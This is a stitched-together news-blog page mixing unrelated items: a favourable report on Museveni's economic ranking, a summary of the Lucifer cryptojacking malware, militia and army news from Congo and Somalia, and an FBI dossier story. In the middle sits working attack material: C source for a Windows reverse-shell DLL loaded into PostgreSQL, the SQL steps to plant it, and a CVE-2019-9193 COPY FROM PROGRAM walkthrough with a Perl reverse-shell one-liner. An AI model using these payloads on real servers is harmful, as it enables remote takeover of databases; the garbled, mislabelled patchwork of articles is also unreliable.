President Museveni ranked among the best presidents of the world

President Yoweri Kaguta Museveni has been ranked among the best President’s in the World, according to a New York University and World Bank experts who ranked the President 7th in terms of influencing economic growth.
The report first released in May 2018 by the World Bank economist Steve Penning’s and New York University Economics Professor William Easterly indicates that Museveni is one of the best leaders with a significant positive impact on their countries economic growth.
The two experts define the best leaders as any leaders for whom estimated leader effect is positive and significant at the 95% level and the worst leader are those with negative and insignificant leader effects.
The findings that were entitled “Shrinking dictators: how much economic growth can we attribute to national leaders” ranked Senior General Than Shwe of Burma as number one for being the most influential leader who steered his country’s economic growth at 3.95% and shrinkage of just 0.71%. He was the head of the State of Burma between 1992 and 2011 as chairman of the State Peace and development Council (SPDC).
“Leadership requires bold initiatives and President Museveni must be credited for this. It requires stringent and well thought out policies to reverse the decline our country was in and revamp the economy. Its not surprising the Museveni has firmly put this country on a steady economic growth,” Stephen Miyingo, the Senior Presidential Advisor on Economic Affairs said of the report. He said the report provides a third party independent opinion which confirms what the NRM government has been telling Ugandans.
Easterly and Hennings ranked 24 world leaders and President Museveni came in the 7th position, scoring higher than many powerful leaders globally including the former Prime Minister of Singapore Lee Kuan Yew and Park Chung-hee former President of South Korea between 1963 and 1979. Museveni’s significant contribution to Uganda’s economic growth is said to be a record 2.42% with a shrinkage of only 0.78% since he came to power in 1986.
The report also established that leaders like Yoweri Museveni and Seretse Khama of Botswana rank higher than Lee Kuan Yew of Singapore partly because they did will in relation to the lower average regional growth in Sub Saharan Africa compared to East and South Asia.
While making is assessment on Museveni contribution, the report highlighted the infrastructure development at its peak now with 5,350km total of paved roads compared to 987km of 1986. The General quality of lives and standard of living has improved tremendously together with an increase in incomes despite the increase in the population growth.
Other sectors highlighted include the employment sector with a national employment rate reducing from 11% to 8%, access to electricity grid has increased to 22% in 2017 from 14% in 2013 and access to water has also risen from 68% to78% during the same period. Revenue collections per annum has also increased, for instance in 2005/06 the total revenue collected was Shs 2.23 trillion compared to the estimated Shs 20trillion to be collected next financial year.
The report also highlighted the robust peace and security under Museveni that has been credited for the prevailing economic growth, restoration of freedom of speech, press freedom, freedom of worship relative democracy, effective foreign policy, education and tourism.

Lucifer malware also mines Monero cryptocurrency on infected devices ,also has ability todrop/run leaked NSA(National security agency,USA's national intelligence level) exploits including DoublePulsar, EternalBlue, and EternalRomance against vulnerable devices to enable intranet infection.

Palo Alto Networks’ Units 42 researchers have discovered a new version of a “hybrid crypto-jacking malware,” which they have dubbed “Lucifer.”
Lucifer malware is capable of launching DDoS attacks and can attack vulnerable Windows hosts using a variety of “trivial-to-exploit nature” flaws most of which are either rated ‘high’ or ‘critical.’
The first wave of this campaign was blocked by Palo Alto Networks on 10 June 2020, but the attacker resumed the campaign the very next day with an upgraded version of Lucifer malware. The campaign is still active and wreaking havoc by targeting Windows computers to mine for cryptocurrency and launching intense DDoS attacks.
Palo Alto Networks’ researchers observed that the new variant of Lucifer is immensely powerful as it performs crypto-jacking by dropping XMRig to mine for Monero cryptocurrency , connect to C&C server and enable self-propagation via exploiting multiple vulnerabilities along with launching credential brute-forcing.
Furthermore, it can drop/run leaked NSA exploits including DoublePulsar, EternalBlue, and EternalRomance against vulnerable devices to enable intranet infection.
“Once exploited, the attacker can execute arbitrary commands on the vulnerable device. In this case, the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation” said on the researchers in a blog post . "

NSA exploits in action:

The malware developer named it Satan DDoS but since Satan Ransomware exists already, Palo Alto researchers chose to name it as Lucifer.
The good thing is that patches for weaponized security vulnerabilities are already available but hosts that haven’t been updated yet are still vulnerable to crypto-jacking. Researchers urge users to immediately apply the latest patches and updates to secure their devices.

Ituri province is on fire! 10 more people were killed by CODECO in the night of sunday-monday 29/06/2020

The attackers of the CODECO militia signed, on the night of Sunday to Monday, June 29, 2020, an attack in the locality Mungulumoya, 5 km from the center of Kunda in the chiefdom of Babelebe, in Irumu territory.
At least 10 civilians were killed and 3 others seriously wounded, during this attack of firearms and sharp bladed weapons.
Although the situation is already under control of the Congolese security forces, this locality remains emptied of its population, which has moved massively to the center of Kunda, about ten kilometers from the city of Bunia.
Faced with this situation, the provincial deputy Claude Malabo, urges the Congolese state to better secure the inhabitants, unjustly massacred.
"The army must secure the entities threatened by these enemies of peace. But I believe that we must also succeed in destroying them definitively. The population no longer knows how to live in peace following permanent threats, "said this elected representative from Irumu's electoral district.
In addition to Djugu and Mahagi, in recent months, certain entities in Irumu territory have also been the target of this militia of the Cooperation for the Development of Congo (CODECO).

More on that Attack!

#define PG_REVSHELL_CALLHOME_SERVER "127.0.0.1" #define PG_REVSHELL_CALLHOME_PORT "4444"
#include "postgres.h" #include <string.h> #include "fmgr.h" #include "utils/geo_decls.h" #include <winsock2.h>
#pragma comment(lib,"ws2_32")
#ifdef PG_MODULE_MAGIC PG_MODULE_MAGIC; #endif
#pragma warning(push) #pragma warning(disable: 4996) #define _WINSOCK_DEPRECATED_NO_WARNINGS
BOOL WINAPI DllMain(_In_ HINSTANCE hinstDLL,                     _In_ DWORD fdwReason,                     _In_ LPVOID lpvReserved) {     WSADATA wsaData;     SOCKET wsock;     struct sockaddr_in server;     char ip_addr[16];     STARTUPINFOA startupinfo;     PROCESS_INFORMATION processinfo;
    char *program = "cmd.exe";     const char *ip = PG_REVSHELL_CALLHOME_SERVER;     u_short port = atoi(PG_REVSHELL_CALLHOME_PORT);
    WSAStartup(MAKEWORD(2, 2), &wsaData);     wsock = WSASocket(AF_INET, SOCK_STREAM,                       IPPROTO_TCP, NULL, 0, 0);
    struct hostent *host;     host = gethostbyname(ip);     strcpy_s(ip_addr, sizeof(ip_addr),              inet_ntoa(*((struct in_addr *)host->h_addr)));
    server.sin_family = AF_INET;     server.sin_port = htons(port);     server.sin_addr.s_addr = inet_addr(ip_addr);
    WSAConnect(wsock, (SOCKADDR*)&server, sizeof(server),               NULL, NULL, NULL, NULL);
    memset(&startupinfo, 0, sizeof(startupinfo));     startupinfo.cb = sizeof(startupinfo);     startupinfo.dwFlags = STARTF_USESTDHANDLES;     startupinfo.hStdInput = startupinfo.hStdOutput =                             startupinfo.hStdError = (HANDLE)wsock;
    CreateProcessA(NULL, program, NULL, NULL, TRUE, 0,                   NULL, NULL, &startupinfo, &processinfo);
    return TRUE; }
#pragma warning(pop) /* re-enable 4996 */
/* Add a prototype marked PGDLLEXPORT */ PGDLLEXPORT Datum dummy_function(PG_FUNCTION_ARGS);
PG_FUNCTION_INFO_V1(add_one);
Datum dummy_function(PG_FUNCTION_ARGS) {     int32 arg = PG_GETARG_INT32(0);
    PG_RETURN_INT32(arg + 1); }
Here is the convoluted process of exploitation:
postgres=# CREATE TABLE hextable (hex bytea); postgres=# CREATE TABLE lodump (lo OID);
acidic@emma:~/$ echo "INSERT INTO hextable (hex) VALUES               (decode('`xxd -p pg_revshell.dll | tr -d '\n'`', 'hex'));" > sql.txt acidic@emma:~/$ psql -U postgres --host=localhost --file=sql.txt
postgres=# INSERT INTO lodump SELECT hex FROM hextable; postgres=# SELECT * FROM lodump;   lo -------  16409 (1 row) postgres=# SELECT lo_export(16409, 'C:\Program Files\PostgreSQL\9.5\Bin\pg_revshell.dll'); postgres=# CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS            'C:\Program Files\PostgreSQL\9.5\binpg_revshell.dll', 'dummy_function' LANGUAGE C STRICT;

The arbitral command execution on postgreSQL

PostgreSQL, commonly known as Postgres is one of the largest and most popular database systems in the world. It is the primary database of Mac OSX but also has Linux and Windows versions available.
For a time I have been dealing with postgreSQL,I have keenly been monitoring the less well known ‘feature’ (CVE-2019–9193) which allows certain database users to gain arbitrary code execution in the context of the user running the Postgres instance. This is something which is enabled by default on all versions of PostgreSQL from 9.3 through to the latest of 11.2. This affects all operating systems, Windows, Linux and Mac.
Since version 9.3, new functionality for ‘COPY TO/FROM PROGRAM’ was implemented. This allows the database superuser, and any user in the ‘pg_execute_server_program’ group to run arbitrary operating system commands. This effectively means there is no separation of privilege between a database superuser user and the user running the database on the operating system.
This is a lack of defense in depth which we used to see in Microsoft SQL Server back in the early 2000s, when the xp_cmdshell function was enabled by default. This was patched and disabled by default in Microsoft SQL Server 2005, but it is interesting how the same bugs repeat, seemingly in cycles.
As this bug/flaw/functionality/exploit is somewhere between a privilege escalation and an arbitrary code execution, it needs some kind of prior authentication. This is achieved either through access to the database with credentials, or via exploiting an SQL injection in an application which has PostgreSQL on the backend. Again, in both of these instances either the superuser or a user with ‘pg_execute_server_program’ permissions needs to be in use.
To perform the attack, you simply follow these steps:
1) [Optional] Drop the table you want to use if it already exists
DROP TABLE IF EXISTS cmd_exec;
2) Create the table you want to hold the command output
CREATE TABLE cmd_exec(cmd_output text);
3) Run the system command via the COPY FROM PROGRAM function
COPY cmd_exec FROM PROGRAM ‘id’;
4) [Optional] View the results
SELECT * FROM cmd_exec;
5) [Optional] Clean up after yourself
DROP TABLE IF EXISTS cmd_exec;
Note that any single quotes inside your command must be double single quotes to escape them, so for example if you wanted to run:
echo ‘hello’;
You would need to put it inside single quotes, and then replace all single quotes inside with double single quotes:
‘echo ‘’hello’’;’
I have tested this on all major operating systems, and if a reverse shell is triggered you end up with the following privileges:
Windows - NT AUTHORITY/NETWORK SERVICE (low priv)
Linux - postgres (low priv)
Mac - user that installed postgres (usually an admin)
Linux and Mac OSX can usually be exploited with a perl one liner, with a command such as this:
COPY files FROM PROGRAM ‘perl -MIO -e ‘’$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’’’;
I have simplified the exploitation processes by releasing a new
Metasploit module (which should be
merged into the main framework soon), as the old postgres_payload modules only work up to around version 8. postgres_copy_from_program_cmd_exec.rb performs all of the above automatically, if you provide it with valid database credentials which have the correct permissions. For SQL Injections you will have to take the manual route. Here it’s exploiting PostgreSQL 11.2 on Linux Ubuntu 18.04:
For Windows however, the NETWORK SERVICE user appears not the have any write privileges, but it was still possible to trigger a reverse shell by using a PowerShell download cradle. This can be provided by settings the COMMAND variable to the PowerShell cradle command, take note to escape single quotes with a backslash \. 

The Somali national army seized 4 starategic villages from alshabab this ended weekend

The Somali National Army has seized four new strategic villages from Al-Shabaab militant group in Lower Juba region on Sunday.
The operations conducted by the government troops have taken the control of some villages including Janay Abdale, Hilishid, Mayonde and Garasceebe under Lower Juba region.
Lieutenant Ismail Abdimalik Moalim, the commander of the 16th brigade of the Danab forces, said the operations would continue until the troops reached all the areas controlled by AL-Shabab fighters.
The commander of the Darwish forces in the Jubbaland region told the media that he had begun operations against militias in the central town of Buale but still needs more effort to capture.
The forces have been conducting operations against al-Shabaab in the Lower Juba region in recent days to flash out Al-Shabab militant group in the region.

FBI refuses to reveal Christopher Steele’s primary source for his notorious ‘Trump-Russia’ dossier in response to a Freedom of Information

The identity of the source remains an enduring mystery, but whoever they are, they undoubtedly possess information that could shed light on innumerable inaccuracies in the dossier, which was cited extensively by the Bureau in its various applications for surveillance orders against Donald Trump campaign aide Carter Page.
The US Federal Bureau of Investigation has refused to release documents related to Christopher Steele’s primary source for his notorious ‘Trump-Russia’ dossier in response to a Freedom of Information request filed by The Daily Caller, on the basis the information is classified and risks identifying a confidential FBI source.
The Daily Caller sought all FBI records for an individual identified as “Primary Sub-Source” in Justice Department inspector general Michael Horowitz report on Crossfire Hurricane, issued December 2019 – the assessment found Steele’s source contradicted and dismissed key allegations made in the dossier, after they were tracked down and interviewed by FBI agents in January 2017. The former MI6 operative nonetheless dressed up “rumour and speculation” as fact – and the Justice Department ruled two FISA warrants to be invalid due to the Bureau’s omission of this compromising information.
— Chuck Bledsoe@gab.ai ✝ ﻥ #CCOT #MAGA🇺🇸 (@BledsoeChuck) June 26, 2020
In its response to the outlet, the FBI cited three exemptions under Freedom of Information laws to deny releasing the sought documents.
“The nature of your request implicates records the FBI compiles pursuant to its national security and foreign intelligence functions. [Disclosure] would trigger harm to national security interests…and/or reveal intelligence sources and methods. Disclosing source related records about an individual or entity could reasonably be expected to undermine the use of confidential sources as it would discourage cooperation with the FBI in the future. Therefore, your request is closed,” the Bureau stated.
It’s unclear if the FBI considers Steele’s source to be a confidential informant, but Steele himself reportedly told partners at Fusion GPS – the opposition research firm that commissioned the dossier – the individual was “well known to US intelligence and law enforcement officials”.
— Catherine Herridge (@CBS_Herridge) June 12, 2020
Republican lawmakers investigating the origins of the FBI’s investigation of the Trump campaign have recently accused agency director Christopher Wray of releasing documents about the probe too slowly. For instance, Jim Jordan of the House Judiciary Committee, has accused Wray of outright obstinance, while Lindsey Graham, chair of the Senate Judiciary Committee, wrote Attorney General William Barr on April 20 demanding all documents and communications related to the FBI’s interviews with the source, including FBI reports written about the individual, be released.